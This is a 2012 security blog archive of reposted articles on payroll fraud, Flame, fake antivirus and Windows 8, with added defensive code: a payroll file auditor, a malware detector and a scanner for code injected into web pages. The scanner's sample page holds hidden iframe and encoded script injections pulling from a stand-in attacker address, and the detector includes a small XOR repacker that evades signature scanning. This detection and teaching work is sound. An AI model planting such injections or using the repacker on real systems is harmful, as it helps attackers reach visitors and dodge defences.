Saturday, December 1, 2012

Hacker attack siphons off $150,000 in teacher salaries from payroll systems

Hackers used the American Thanksgiving holiday to launch a crafty attack against a local school district in the state of Wisconsin, compromising a direct deposit system, and stealing $150,000 intended for teachers.

Administrators in the Stanley-Boyd school district in the western part of Wisconsin were alerted to the attack by their bank on November 21, according to a report in the Chippewa Herald.

According to the newspaper, the attackers compromised the district's network and altered its direct deposit file, supplanting employee bank account information with accounts belonging to the attackers.

AnchorBank, based in Madison, Wisconsin, noticed the unusual activity and alerted the district. The district has notified the FBI, which is investigating.

In the meantime, AnchorBank said it had been able to retrieve a portion of the stolen payroll as of November 27, and believed it could recover most of the lost funds.
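The attack worked by editing the file the district hands its bank, so the cheapest control is to diff that file against what HR actually has on record before it is released. The following is an added example, not code from the article or the district: it parses the standard 94-column NACHA entry detail records in a direct deposit file, validates each routing number's check digit, and flags any employee whose destination account differs from the approved roster or whose pay is being routed into an account shared with other employees (the usual mule-account pattern). The roster, routing numbers, account numbers, employee ids and amounts are constructed sample data.

```python
"""Audit a NACHA (ACH) direct-deposit file against the HR roster before it goes to the bank.

Added example for this post, not code from the article or the district. Record offsets follow
the 94-column NACHA entry detail record (type 6); all sample data below is constructed.
"""
import re
from dataclasses import dataclass
from typing import Dict, List, Tuple

Destination = Tuple[str, str]  # (routing number, account number)


@dataclass(frozen=True)
class Entry:
    employee_id: str
    name: str
    routing: str   # 8-digit receiving DFI id + 1 check digit
    account: str
    cents: int
    trace: str


def routing_check_digit_ok(routing: str) -> bool:
    """ABA routing-number checksum: weights 3,7,1 repeated; the weighted sum is 0 mod 10."""
    if not re.fullmatch(r"\d{9}", routing):
        return False
    weights = (3, 7, 1, 3, 7, 1, 3, 7, 1)
    return sum(int(d) * w for d, w in zip(routing, weights)) % 10 == 0


def parse_ppd_entries(nacha_text: str) -> List[Entry]:
    """Return the type-6 entry detail records; headers, addenda and control records are skipped."""
    entries = []
    for line in nacha_text.splitlines():
        if len(line) != 94 or line[0] != "6":
            continue
        entries.append(Entry(
            employee_id=line[39:54].strip(),   # individual identification number
            name=line[54:76].strip(),          # individual name
            routing=line[3:12],                # receiving DFI id + check digit
            account=line[12:29].strip(),       # DFI account number
            cents=int(line[29:39]),            # amount, in cents
            trace=line[79:94],                 # trace number
        ))
    return entries


def audit(entries: List[Entry], roster: Dict[str, Destination]) -> List[Tuple[str, str, str]]:
    """Compare every payment with the destination HR has on file; return (who, finding, detail)."""
    findings = []
    by_destination: Dict[Destination, List[str]] = {}
    for e in entries:
        expected = roster.get(e.employee_id)
        if expected is None:
            findings.append((e.employee_id, "UNKNOWN_EMPLOYEE", e.trace))
            continue
        if (e.routing, e.account) != expected:
            findings.append((e.employee_id, "DESTINATION_CHANGED", e.trace))
        if not routing_check_digit_ok(e.routing):
            findings.append((e.employee_id, "BAD_ROUTING", e.trace))
        by_destination.setdefault((e.routing, e.account), []).append(e.employee_id)
    # Several employees paid into one account is the classic mule-account pattern.
    for (_, account), ids in by_destination.items():
        if len(ids) > 1:
            findings.append((",".join(ids), "SHARED_DESTINATION", account))
    return findings


def _entry_line(routing, account, cents, emp_id, name, trace) -> str:
    """Build one 94-column PPD entry detail record (constructed sample, not a real payroll)."""
    return ("6" + "22"                    # record type 6, transaction code 22 = checking credit
            + routing
            + f"{account:<17}"[:17]
            + f"{cents:010d}"
            + f"{emp_id:<15}"[:15]
            + f"{name:<22}"[:22]
            + "  " + "0"                  # discretionary data, addenda indicator
            + f"{trace:<15}"[:15])


APPROVED_ROSTER: Dict[str, Destination] = {  # constructed: what HR has on file
    "E1001": ("011000015", "123456789"),
    "E1002": ("011000015", "987654321"),
    "E1003": ("011000015", "111222333"),
    "E1004": ("011000015", "444555666"),
    "E1005": ("011000015", "222333444"),
}

SAMPLE_FILE = "\n".join([
    "1" + " " * 93,  # file header (contents irrelevant to this check)
    "5" + " " * 93,  # batch header
    _entry_line("011000015", "123456789", 312500, "E1001", "A TEACHER", "091000010000001"),
    _entry_line("011000015", "987654321", 298000, "E1002", "B TEACHER", "091000010000002"),
    _entry_line("021000021", "555000111", 305000, "E1003", "C TEACHER", "091000010000003"),  # altered
    _entry_line("021000021", "555000111", 301000, "E1004", "D TEACHER", "091000010000004"),  # altered, same account
    _entry_line("011000014", "222333444", 290000, "E1005", "E TEACHER", "091000010000005"),  # bad check digit
    "8" + " " * 93,  # batch control
    "9" + " " * 93,  # file control
])

if __name__ == "__main__":
    for who, what, detail in audit(parse_ppd_entries(SAMPLE_FILE), APPROVED_ROSTER):
        print(f"{what:<20} {who:<12} {detail}")
```

Run as a pre-release gate, the check catches the two redirected salaries and the shared mule account on the constructed file; on a real payroll the roster would come from the HR system of record, not from the same server that builds the ACH file, since that is the server the attackers controlled.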

Hacking school districts isn't about changing grades "War Games"-style (though that still happens, too).

Rather, school districts and municipalities are a prime target for cybercriminal gangs, many based outside the United States.

Hackers are attracted to the small towns because they often are short on IT security expertise, but have easy access to cash through bank accounts and lines of credit. Beyond that, the decentralized nature of many municipal operations can make detection difficult.

In just the latest incident, in October, the town of Burlington, Washington, disclosed that hackers had compromised a number of town systems used to operate an online utility billing system and stolen $400,000 from a city bank account.

Article Source

How Much Do Antivirus Rankings Matter to You?

German antivirus lab AV-Test recently tested several security suites. Most scored lower than they had a few months ago, particularly Microsoft Security Essentials, our favorite Windows antivirus app. We still love it, but the recent AV-Test results make us wonder: how much do these ratings matter to you?

Microsoft Security Essentials fell half a point short of passing the AV-Test certification, due to problems detecting zero-day threats. Other recent tests by AV-Comparatives were better, but still mixed. Microsoft Security Essentials has never been the top ranker in these tests (the top spots usually go to the paid security suites), but the drop is worth pondering.

What do you think? Does it matter to you?

Sunday, October 14, 2012

The Antivirus Era Is Over

Two weeks ago today, computer security labs in Iran, Russia, and Hungary announced the discovery of Flame, "the most complex malware ever found," according to Hungary's CrySyS Lab.

For at least two years, Flame has been copying documents and recording audio, keystrokes, network traffic, and Skype calls, and taking screenshots from infected computers. That information was passed along to one of several command-and-control servers operated by its creators. In all that time, no security software raised the alarm.

Flame is just the latest in a series of incidents that suggest that conventional antivirus software is an outmoded way of protecting computers against malware. "Flame was a failure for the antivirus industry," Mikko Hypponen, the founder and chief research officer of antivirus firm F-Secure, wrote last week. "We really should have been able to do better. But we didn't. We were out of our league, in our own game."

The programs that are the linchpin of computer security for businesses, governments, and consumers alike operate like the antivirus software on consumer PCs. Threats are detected by comparing the code of software programs and their activity against a database of "signatures" for known malware. Security companies such as F-Secure and McAfee constantly research reports of new malware and update their lists of signatures accordingly. The result is supposed to be an impenetrable wall that keeps the bad guys out.

However, in recent years, high-profile attacks on not just the Iranian government but also the U.S. government have taken place using software that, like Flame, was able to waltz straight past signature-based software. Many technically sophisticated U.S. companies—including Google and the computer security firm RSA—have been targeted in similar ways, albeit with less expensive malware, for their corporate secrets. Smaller companies are also routinely compromised, experts say.

Some experts and companies now say it's time to demote antivirus-style protection. "It's still an integral part [of malware defense], but it's not going to be the only thing," says Nicolas Christin, a researcher at Carnegie Mellon University. "We need to move away from trying to build Maginot lines that look bulletproof but are actually easy to get around."

Both Christin and several leading security startups are working on new defense strategies to make attacks more difficult, and even enable those who are targeted to fight back.

"The industry has been wrong to focus on the tools of the attackers, the exploits, which are very changeable," says Dmitri Alperovitch, chief technology officer and cofounder of CrowdStrike, a startup in California founded by veterans of the antivirus industry that has received $26 million in investment funding. "We need to focus on the shooter, not the gun—the tactics, the human parts of the operation, are the least scalable."

CrowdStrike isn't ready to go public with details of its technology, but Alperovitch says the company plans to offer a kind of intelligent warning system that can spot even completely novel attacks and trace their origins.

This type of approach is possible, says Alperovitch, because, although an attacker could easily tweak the code of a virus like Flame to evade antivirus scanners once more, he or she would still have the same goal: to access and extract valuable data. The company says its technology will rest on "big data," possibly meaning it will analyze large amounts of data related to many traces of activity on a customer's system to figure out which could be from an infiltrator.
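The two paragraphs above (the description of signature matching, and Alperovitch's point that an attacker can re-tweak the bytes but not the goal) are easier to weigh with both detectors side by side. The following is an added example, not code from CrowdStrike, F-Secure or any vendor named in the article: a byte-pattern and hash signature scanner, a trivial repacker of the kind that defeats it, and a behaviour rule that keys on what the program does (reads user documents, captures keystrokes or audio, sends data off-host) and so matches the original and the repacked variant alike while leaving a backup agent alone. The "binary", the signature database and the sandbox traces are all constructed stand-ins.

```python
"""Signature matching beside behaviour matching, on constructed samples.

Added example for this article, not code from any vendor named in it. The "binary", the
signature database and the sandbox traces are all constructed stand-ins.
"""
import hashlib
import re
from typing import Dict, List, Optional, Tuple

# --- Signature-based detection: bytes of the program compared against known patterns ---
SIG_PATTERNS: Dict[str, bytes] = {           # constructed pattern database
    "Spy.Generic.beacon": b"POST /upload HTTP/1.1",
    "Spy.Generic.keylog": b"GetAsyncKeyState",
}
SIG_HASHES: Dict[str, str] = {}              # sha256 -> name, filled below

# Constructed stand-in for a spyware binary: the strings an analyst would carve a signature from.
ORIGINAL_SAMPLE = (b"MZ\x90\x00" + b"\x00" * 16
                   + b"GetAsyncKeyState\x00waveInOpen\x00"
                   + b"POST /upload HTTP/1.1\r\nHost: 203.0.113.5\r\n" + b"\x00" * 8)
SIG_HASHES[hashlib.sha256(ORIGINAL_SAMPLE).hexdigest()] = "Spy.Generic.sample"


def signature_scan(blob: bytes) -> Optional[str]:
    """Return the matching signature name, or None if nothing in the database matches."""
    hit = SIG_HASHES.get(hashlib.sha256(blob).hexdigest())
    if hit:
        return hit
    for name, pattern in SIG_PATTERNS.items():
        if pattern in blob:
            return name
    return None


def repack(blob: bytes, key: bytes) -> bytes:
    """The cheap evasion the article describes: XOR-encode the body behind a decoder stub.
    What the program does after decoding is unchanged; only the bytes on disk differ, so both
    the hash and the byte-pattern signatures stop matching. (A real packer also varies the
    stub, which is why signatures on the stub age just as fast.)"""
    header, body = blob[:4], blob[4:]
    encoded = bytes(b ^ key[i % len(key)] for i, b in enumerate(body))
    return header + b"STUB" + key + encoded


# --- Behaviour-based detection: what the program does, which the attacker cannot change ---
Event = Tuple[str, str]   # (action, target) as a sandbox or endpoint sensor would record it
PRIVATE_PREFIXES = ("10.", "192.168.", "127.", "172.16.")
USER_DATA = re.compile(r"\\Users\\[^\\]+\\(Documents|Desktop)\\", re.I)


def behaviour_scan(trace: List[Event]) -> Optional[str]:
    """Flag the goal, not the bytes: reads user files, captures input or audio, sends off-host."""
    actions = {action for action, _ in trace}
    reads_user_data = any(a == "file_read" and USER_DATA.search(t) for a, t in trace)
    captures = actions & {"audio_capture", "keystroke_hook", "screenshot"}
    exfil = any(a == "net_send" and not t.startswith(PRIVATE_PREFIXES) for a, t in trace)
    if reads_user_data and captures and exfil:
        return "Behaviour.Espionage[" + ",".join(sorted(captures)) + "]"
    return None


# Constructed sandbox traces: the repacked sample produces the same trace as the original.
SPY_TRACE: List[Event] = [
    ("file_read", r"C:\Users\jdoe\Documents\contract.docx"),
    ("keystroke_hook", "global"),
    ("audio_capture", "waveIn0"),
    ("net_send", "203.0.113.5:443"),
]
BACKUP_TRACE: List[Event] = [     # a legitimate backup agent: reads documents, uploads, no capture
    ("file_read", r"C:\Users\jdoe\Documents\contract.docx"),
    ("net_send", "203.0.113.9:443"),
]


def demo() -> Dict[str, Optional[str]]:
    """Run both detectors over the original sample, its repacked variant and a benign trace."""
    variant = repack(ORIGINAL_SAMPLE, b"\x5a\xa5")
    return {
        "sig:original": signature_scan(ORIGINAL_SAMPLE),
        "sig:repacked": signature_scan(variant),
        "behaviour:spyware": behaviour_scan(SPY_TRACE),
        "behaviour:backup": behaviour_scan(BACKUP_TRACE),
    }


if __name__ == "__main__":
    for k, v in demo().items():
        print(f"{k:<20} {v}")
```

The behaviour rule is deliberately coarse; in practice it is the combination (collection plus capture plus exfiltration) that keeps the false-positive rate down, since each action on its own is something a legitimate program does.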

Christin, of Carnegie Mellon, who has recently been investigating the economic motivations and business models of cyber attackers, says that makes sense. "The human costs of these sophisticated attacks are one of the largest," he says. Foiling an attack is no longer a matter of neutralizing a chunk of code from a lone genius, but of defeating skilled groups of people. "You need experts in their field that can also collaborate with others, and they are rare," says Christin. Defense software that can close off the most common tactics makes it even harder for attackers, he says.

Other companies have begun talking in similar terms. "It goes back to that '80s law enforcement slogan: 'Crime doesn't pay,' " says Sumit Agarwal, a cofounder of Shape Security, another startup in California that recently came out of stealth mode. The company has $6 million in funding from ex-Google CEO Eric Schmidt, among others. Agarwal's company is also keeping quiet about its technology, but it aims to raise the cost of a cyber assault relative to the economic payoff, thus making it not worth the trouble to carry out.

A company with a similar approach is Mykonos Software, which developed technology that helps protect websites by wasting hackers' time to skew the economics of an attack. Mykonos was bought by networking company Juniper earlier this year.

Antivirus companies have been quick to point out that Flame was no ordinary computer virus. It came from the well-resourced world of international espionage. But such cyberweapons cause collateral damage (the Stuxnet worm targeted at the Iranian nuclear program actually infected an estimated 100,000 computers), and features of their designs are being adopted by criminals and less-resourced groups.

"Never have so many billions of dollars of defense technology flowed into the public domain," says Agarwal of Shape Security. While the U.S. military goes to extreme lengths to prevent aircraft or submarines from falling into the hands of others, military malware such as Flame or Stuxnet is out there for anyone to inspect, he says.

Agarwal and Alperovitch of CrowdStrike both say the result is a new class of malware being used against U.S. companies of all sizes. Alperovitch claims to know of relatively small law firms being attacked by larger competitors, and green technology companies with less than 100 employees having secrets targeted.

Alperovitch says his company will enable victims to fight back, within the bounds of the law, by also identifying the source of attacks. "Hacking back would be illegal, but there are measures you can take against people benefiting from your data that raise the business costs of the attackers," he says. Those include asking the government to raise a case with the World Trade Organization, or going public with what happened to shame perpetrators of industrial espionage, he says.

Research by Christin and other academics has shown that chokepoints do exist that could allow relatively simple legal action to neutralize cybercrime operations. Christin and colleagues looked into scams that manipulate search results to promote illicit pharmacies and concluded that most could be stopped by clamping down on just a handful of services that redirect visitors from one Web page to another. And researchers at the University of California, San Diego, showed last year that income from most of the world's spam passes through just three banks. "The most effective intervention against spam would be to shut down those banks, or introduce new regulation," says Christin. "These complex systems often have concentrated points on which you can focus and make it very expensive to carry out these attacks."

But Agarwal warns that even retribution within the law can be ill-judged: "Imagine you're a large company and accidentally swim into the path of the Russian mafia. You can stir up a larger problem than you intended."

Saturday, September 29, 2012

Top Eight Security Tips for Windows 8

Microsoft is releasing Windows 8, the newest version of the Windows operating system, for general availability on October 26. Although Windows 8 offers enhanced security features, it also raises new security concerns because of changes to the graphical user interface and a new online app store. We’re offering the following eight security tips to help you stay secure as you move to Windows 8.

1. Exercise caution with apps for the new Windows 8 user interface (formerly known as Metro)

Some familiar applications have been completely re-written for the new Windows 8 UI. As a result they may work completely differently, despite looking the same. For example, an application historically delivered as an executable could now be entirely web-based. This impacts the visibility your existing security and monitoring tools have into these apps.

2. Use the Windows 8 style UI version of Internet Explorer

Plug-ins are disabled by default in this version of the browser, which removes a major target of exploit kits such as Blackhole.

3. Make sure your security vendor can flag malicious Windows 8 UI apps

Windows 8 UI apps have important differences from regular applications, and your security product should be able to distinguish the two. The security product should correctly flag malicious or modified Windows 8 UI applications (tampered, modified, invalid license).

4. Disable hard drive encryption hibernation

Hard drive encryption is a cornerstone of data protection, and hibernation writes the contents of memory to disk, which some encryption products do not handle well. If possible, disable hibernation in Windows 8 through group policy.

5. Make sure your hardware carries the “Designed for Windows 8” logo

To carry this logo, hardware must ship with UEFI firmware and Secure Boot enabled, so you can take advantage of the Secure Boot support in Windows 8. Secure Boot has the firmware verify the signature of each boot loader and driver before it runs, refusing unsigned or tampered pre-OS code, which minimizes the risk from boot loader attacks (bootkits).

6. Make application control a priority

The Windows 8 app store makes application control increasingly important for both malware prevention and productivity control. Microsoft vets Windows Store submissions, but the history of other app stores shows that malicious apps still slip through. Restrict the use of apps that aren't relevant to your organization (AppLocker packaged-app rules are the built-in mechanism for this).

7. Treat Windows RT (ARM) devices like any other mobile devices

Make sure you impose the same security levels on Windows RT devices as all others. You should have the ability to control, track, remote wipe and encrypt them.

8. Review application permissions in the Windows Store

Applications in the Windows Store must list any resources they require. Carefully review these permissions in the details tab as some will grant access by default to your location information, calendar, etc.
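Tips 4, 5, 6 and 8 can each be checked from one elevated PowerShell session on a Windows 8 machine. The script below is an added example, not part of the original article: it reads the hibernation setting from the registry, asks the firmware whether Secure Boot is on, looks for packaged-app (Appx) rules in the effective AppLocker policy, and lists the capabilities declared by every installed Store app for the current user. It assumes the Windows 8 SecureBoot, AppLocker and Appx PowerShell modules are present (they ship with the OS); the list of capabilities treated as sensitive is this editor's choice, not a Microsoft list. The script only reports; the remediation commands are given in comments.

```powershell
# Windows 8 posture check for tips 4, 5, 6 and 8. Added example, not from the original article.
# Run elevated. Read-only: it reports settings, it does not change them.

$report = [ordered]@{}

# Tip 4: hibernation state. HibernateEnabled = 0 means off. To disable: powercfg /hibernate off
$power = Get-ItemProperty -Path 'HKLM:\SYSTEM\CurrentControlSet\Control\Power' -ErrorAction SilentlyContinue
if ($power -and $power.PSObject.Properties['HibernateEnabled']) {
    $report['HibernateEnabled'] = [int]$power.HibernateEnabled
} else {
    $report['HibernateEnabled'] = 'unknown'
}

# Tip 5: Secure Boot. Confirm-SecureBootUEFI throws on legacy BIOS firmware, so an exception means "not UEFI".
try {
    $report['SecureBoot'] = Confirm-SecureBootUEFI
} catch {
    $report['SecureBoot'] = "not available ($($_.Exception.Message))"
}

# Tip 6: does the effective AppLocker policy carry any packaged-app (Appx) rule collections?
$policy = Get-AppLockerPolicy -Effective -ErrorAction SilentlyContinue
$appxCollections = @()
if ($policy) {
    $appxCollections = @($policy.RuleCollections | Where-Object { $_.RuleCollectionType -eq 'Appx' })
}
$report['AppxRuleCollections'] = $appxCollections.Count

# Tip 8: capabilities declared in each installed Store app's manifest (Capability and DeviceCapability).
# Which ones count as sensitive is an assumption made for this check.
$sensitive = 'location', 'webcam', 'microphone', 'internetClientServer', 'enterpriseAuthentication',
             'documentsLibrary', 'picturesLibrary', 'videosLibrary', 'musicLibrary',
             'removableStorage', 'sharedUserCertificates'
$apps = foreach ($pkg in Get-AppxPackage) {
    $manifest = Get-AppxPackageManifest -Package $pkg.PackageFullName -ErrorAction SilentlyContinue
    if (-not $manifest) { continue }
    $caps = @($manifest.Package.Capabilities.Capability.Name) +
            @($manifest.Package.Capabilities.DeviceCapability.Name) |
            Where-Object { $_ }
    [pscustomobject]@{
        Name      = $pkg.Name
        Sensitive = ($caps | Where-Object { $sensitive -contains $_ }) -join ','
        AllCaps   = $caps -join ','
    }
}

[pscustomobject]$report | Format-List
$apps | Where-Object { $_.Sensitive } | Sort-Object Name | Format-Table Name, Sensitive -AutoSize
```

Anything reported as HibernateEnabled 1 on an encrypted laptop, SecureBoot False on logo hardware, or zero Appx rule collections on a domain with Store apps enabled is a finding to act on; the per-app table is the same information the Store's details tab shows, gathered for every app at once.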

You should still run a full security suite for superior filtering and centralized management and reporting. While Microsoft has included a minimalist antivirus and firewall, most organizations will still require commercial-grade security. And of course, all the old security rules also apply with Windows 8. It's still a bad idea to allow automatic log-on. Above all, remain vigilant.

Monday, September 3, 2012

‘Flame’ Virus explained: How it works and who’s behind it

Flame may be the most powerful computer virus in history, and a nation-state is most likely to blame for unleashing it on the World Wide Web. Kaspersky's chief malware expert Vitaly Kamlyuk shared with RT the ins and outs of Stuxnet on steroids.

Iran appears to be the primary target of the data-snatching virus that has swept through the Middle East, though other countries have also been affected. The sheer complexity of the virus and its targets has led Moscow-based Kaspersky Lab to believe a state is behind the attack.

Kaspersky first spotted the virus in 2010, though it may have been wreaking havoc on computer systems for many years. Vitaly Kamlyuk told RT how his company discovered it, just what makes Flame so significant, features of the virus that could point towards its creator, and why we all lose out in this intensifying cyber-war.

RT: So, how did you spot the malware, was it a planned investigation, or did it come by surprise?

Vitaly Kamlyuk: It was by surprise. We were initially searching for a [different form of] malware. We were aware of the malware that had spread throughout the Middle East, attacked hundreds of computers and wiped their hard drives, making the systems unbootable after that. It was actually after an inquiry from the International Telecommunications Union, which is a part of the United Nations, who actually asked us to start conducting research. When we started looking for this mysterious malware in the Middle East, we discovered this suspicious application that turned out to be even more interesting than the initial target of our search.

RT: According to one of your experts, 'Flame' does not appear to cause physical damage, so why has it been dubbed the most hazardous cyber-attacks in history?

VK: It’s actually on the same level as the notoriously known Stuxnet and Duqu [attacks], because we suspect that there is a nation state behind the development of this cyber attack, and there are reasons for that. This application doesn’t fit into any of the existing groups of developed cyber attack tools. There are currently three groups. There are traditional cyber criminals who are hunting users’ data (like log-ins and passwords) to access bank accounts over the Internet and steal money, send spam, or conduct dubious attacks. This [Flame] doesn’t fit into the group of traditional cyber criminal malware. Also, it doesn’t fit into the activists’ malware who are using typically free and open source tools to attack computers on the Internet. And the third known group [at this time] is nation-states.

RT: What makes this malware different from all other Spyware programs and what damage can it do?

VK: It’s pretty advanced – one of the most sophisticated [examples of] malware we’ve ever seen. Even its size – it’s over 20 megabytes if you sum up all the sizes of the modules that are part of the attacking toolkit. It’s very big compared to Stuxnet, which was just hundreds of kilobytes of code: it’s over 20 megabytes. And the Stuxnet analysis took us several months, so you can imagine that a full analysis of this threat may take us up to a year. So we think it is one of the most sophisticated malware [programs] out there.

It’s also quite unique in the way it steals information. It’s possible to steal different types of information with the help of this spyware tool. It can record audio if a microphone is attached to the infected system, it can do screen captures and transmit visual data. It can steal information from the input boxes when they are hidden behind asterisks, password fields; it can get information from there. Also it can scan for locally visible Bluetooth devices if there is a Bluetooth adapter attached to the local system.

RT: Is there a connection between this new cyber threat and previous large-scale virus attacks?

VK: We are trying to compare and find similarities between this development and previous [ones] of course, but there are so few of them – Stuxnet or Duqu mostly. There is no reliable relation between Stuxnet and Flame as we call it…they are completely different. Because Stuxnet was a small application developed for a particular target with the specific objective to interact with industrial control systems and break them down. And Flame is a universal attacking tool kit used mostly for cyber espionage. So there are some things that [Flame] shares in common with Stuxnet and Duqu, and these are the vulnerabilities that are used by both [types of] malware. Probably one malware simply copied vulnerabilities from the other malware program when they were published.

RT: So this means that cyber warfare is evolving rapidly, and 'Flame' vividly confirms this trend. Can less technologically developed nations resist such attacks, or is it game over for them?

VK: It’s never game over in this area, because even if the country isn’t technologically developed in this area, it doesn’t prevent them from cooperating with organizations like ours and with private companies in the security industry that can provide them with valuable pieces of information which can actually result in the discovery of such threats. And when we discover such threats, we permanently add them to antivirus databases, and users from those nations can use freely available trial tools and commercial antivirus [software] to protect their systems.

RT: This enormous stratum of data that 'Flame' can gather, who would need it and is it really possible to analyze such an avalanche of information?

VK: First of all, when we’re talking about the size of data that is to be analyzed, we know that the attackers do not infect as many victims as possible. Their resources are limited; it seems that they understand that. They are keeping the number of infected machines more or less the same. So it’s the same level. When they finish analyzing data that has been stolen from one network, they remove the malware and switch to another. So we think that it’s still possible to extract only the data they are interested in.

RT: So can we call this a cyber war, and if so?

VK: Stuxnet and Duqu were bright examples of cyber weapons which could even physically destroy infrastructure, and this [Flame] is a continuation of this story. So this is another development in this row which continues in addition to Stuxnet and Duqu. There are also nation states supporting [these] developments. We think that cyber warfare has been going on for years already. People were just probably not aware of it because cyber warfare has a unique feature: it’s hidden. Nobody knows when cyber warfare operations are going on. This is the key feature of it.

RT: Who is behind these cyber attacks?

VK: Like with Stuxnet and Duqu, it’s currently unclear who is behind it. It’s very hard to find out who is behind it because when we try to follow the traces, who controls the application – it connects to the command and control centers – it turns out to be… dozens or even more servers spread around different countries around the world. More than 80 or 90 domains are associated with those servers. Most of them are registered with fake identities. So they’re pretty well protected and hidden. So it is unclear who is behind that, and we try not to speculate who could be behind such attacks. We try to base it on pure facts like the language we extract from the code. In this case, we only found traces of good English used inside the code.

RT: So who do you think is winning this war?

VK: I think that humanity is losing to be honest, because we are fighting between each other instead of fighting against global problems which everyone faces in their lives.

Article Source

Sunday, September 2, 2012

Fake antiviruses

Basic description

Fake antivirus software is a scam commonly used by malicious software creators in order to sell fake security software to unwitting victims. The scam will typically involve a webpage or pop-up that informs the user they have viruses or other malware on their computer, even though they do not. It then offers to clean the infection. When the user opts to clean up they are required to pay to obtain a version of the fake software that will perform the cleanup. After the victim pays, the software may or may not cease the fake warnings.

Technical detail

Fake antivirus, also known as rogue antivirus or scareware, is one of the leading ways for malicious hackers to make money from unsuspecting Internet users. The fake antivirus software typically warns the user that they have various fictional security threats present on their computer. The warnings themselves are false but they are often backed up by believable descriptions of the supposed malware.

When the user chooses to remove the threats they are asked to purchase or register the product and taken to a website that will process the payment details.

Fake antivirus is spread using a variety of methods, all designed to draw an unsuspecting user into installing the software.

Email and messaging
Criminals send spam email and social network messages with the software installer attached, using a social engineering lure to persuade the recipient to open the attachment. Common lures include tax refund information, package delivery notifications or pictures of topical news stories.

Search engine poisoning
Hackers create pages related to common or topical search terms and design them to appear high in search engine results. This makes it likely that people will encounter the page during their usual search activity. The webpages may either display warnings about infection that encourage the user to purchase the fake antivirus, or they download a video player which is actually the fake antivirus installer.

Compromised websites
Cybercriminals often break into other websites in order to spread their software, relying on the site's popularity to draw innocent users. The hackers will then install extra code into the compromised pages, again with the goal of either displaying fake security warnings or exploiting a browser vulnerability to install their software directly. Cybercriminals will often combine these techniques to increase the effectiveness of their fraud.
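The "extra code" installed into compromised pages is usually one of a few things: an iframe kept out of sight that loads the exploit or the fake warning from the criminals' server, a script include pointing off-site, or an obfuscated script that writes one of those into the page at load time. The following is an added example, not code from the article's source: a scanner built on Python's html.parser that flags those patterns in a page, given the site's own hostname so that legitimate same-site includes are not reported. The sample page and the addresses in it are constructed.

```python
"""Scan a page for the code criminals inject into compromised sites: hidden or off-site iframes,
off-site script includes and obfuscated script that writes more HTML at load time.

Added example for this post, not code from the article's source. The sample page and the
addresses in it are constructed.
"""
import re
from html.parser import HTMLParser
from typing import Dict, List, Tuple
from urllib.parse import urlparse

Finding = Tuple[str, str]   # (label, what was matched)

SUSPICIOUS_JS = [
    ("eval-unescape", re.compile(r"eval\s*\(\s*unescape\s*\(", re.I)),
    ("write-unescape", re.compile(r"document\.write\s*\(\s*unescape\s*\(", re.I)),
    ("fromcharcode-chain", re.compile(r"String\.fromCharCode\s*\((?:\s*\d+\s*,){20,}", re.I)),
    ("encoded-blob", re.compile(r"(?:\\x[0-9a-f]{2}){40,}|(?:%[0-9a-f]{2}){40,}", re.I)),
]


def _hidden(attrs: Dict[str, str]) -> bool:
    """True for the usual ways an injected iframe is kept out of sight."""
    style = attrs.get("style", "").replace(" ", "").lower()
    if "display:none" in style or "visibility:hidden" in style:
        return True
    if re.search(r"(?:left|top):-\d{3,}", style):      # parked far off-screen
        return True
    dims = [attrs[k].strip().lower().rstrip("px") for k in ("width", "height") if k in attrs]
    return bool(dims) and all(d in ("0", "1") for d in dims)


class InjectionScanner(HTMLParser):
    def __init__(self, site_host: str):
        super().__init__()
        self.site_host = site_host.lower()
        self.findings: List[Finding] = []
        self._in_script = False
        self._script: List[str] = []

    def _offsite(self, url: str) -> bool:
        host = (urlparse(url).hostname or "").lower()
        return bool(host) and host != self.site_host and not host.endswith("." + self.site_host)

    def handle_starttag(self, tag, attrs):
        a = {k.lower(): (v or "") for k, v in attrs}
        if tag == "iframe":
            src = a.get("src", "")
            if _hidden(a):
                self.findings.append(("hidden-iframe", src))
            elif self._offsite(src):
                self.findings.append(("offsite-iframe", src))
        elif tag == "script":
            self._in_script, self._script = True, []
            if self._offsite(a.get("src", "")):
                self.findings.append(("offsite-script", a["src"]))

    def handle_data(self, data):
        if self._in_script:             # html.parser hands script bodies over as data
            self._script.append(data)

    def handle_endtag(self, tag):
        if tag == "script" and self._in_script:
            self._in_script = False
            body = "".join(self._script)
            for label, rx in SUSPICIOUS_JS:
                if rx.search(body):
                    self.findings.append((label, body[:60]))


def scan_page(html: str, site_host: str) -> List[Finding]:
    scanner = InjectionScanner(site_host)
    scanner.feed(html)
    scanner.close()
    return scanner.findings


# Constructed sample: a small-town site with two injections and a third-party analytics include.
SAMPLE_PAGE = """<html><head><title>Town Library</title>
<script src="/js/site.js"></script>
<script src="http://cdn.example.net/stats.js"></script>
</head><body>
<h1>Opening hours</h1>
<iframe src="http://203.0.113.7/in.php" width="1" height="1" style="visibility:hidden"></iframe>
<iframe src="/calendar" width="600" height="400"></iframe>
<script>document.write(unescape('%3Cscript%20src%3D%22http%3A%2F%2F203.0.113.7%2Fav.js%22%3E%3C%2Fscript%3E'));</script>
<script>var greeting = "welcome";</script>
</body></html>"""

if __name__ == "__main__":
    for label, detail in scan_page(SAMPLE_PAGE, "library.example.org"):
        print(f"{label:<18} {detail}")
```

Off-site script includes are reported rather than blocked because analytics and ad networks look the same from the page's point of view; the value of the scanner is in diffing its output against a known-good run, so that a newly appeared off-site include or hidden iframe stands out.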

The fake antivirus software makers use a variety of names for their software to make it appear legitimate. Examples of these names include:
Antivirus Plus
Antivirus Soft
Antivirus XP
Smart Internet Protection
Security Defender

Some will also steal the names of legitimate security software.

Article Source

Friday, August 31, 2012

Bitdefender Relaunches Clueful as Free Social Web-Guide on iOS App Behavior

Former iOS Privacy App made available again with more features for consumers to learn how Apps treat their data and privacy

Bitdefender, the award-winning provider of innovative antivirus solutions, today announced the relaunch of Clueful, the first security application to empower iPhone owners to distinguish privacy-violating apps. Replacing the controversially removed iOS App Store version, Clueful returns as a free web app globally.

 Available for free at via iPhones, iPads and PCs alike, the new Clueful adds more features and more vital privacy information for users. Users are informed of Apps that are careless with usernames and passwords, track location, read and use address books, access calendars, drain a device’s battery, overly target users with ads, don't encrypt personal data or transmissions, track and aggregate the owner’s usage through multiple analytics networks, and more.

Alongside access to Top App listing information, users can now add comments on any App’s clue card and comment on how developers handle their privacy.

